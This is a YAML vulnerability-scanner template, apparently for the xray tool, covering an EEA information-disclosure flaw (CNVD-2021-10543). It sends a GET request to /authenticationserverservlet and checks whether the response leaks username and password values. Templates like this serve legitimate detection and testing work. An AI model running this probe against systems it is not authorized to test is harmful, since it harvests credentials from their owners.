漏洞描述
EEA 存在信息泄露漏洞,攻击者可通过该漏洞获取系统敏感信息。
id: CNVD-2021-10543
info:
name: EEA Information Disclosure
author: Search?=Null
severity: high
description: |-
EEA 存在信息泄露漏洞,攻击者可通过该漏洞获取系统敏感信息。
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
tags: cnvd,cnvd2021,eea,disclosure
created: 2021/10/23
rules:
r0:
request:
method: GET
path: /authenticationserverservlet
expression: response.status == 200 && "<username>(.*?)</username>".bmatches(response.body) && "<password>(.*?)</password>".bmatches(response.body)
expression: r0()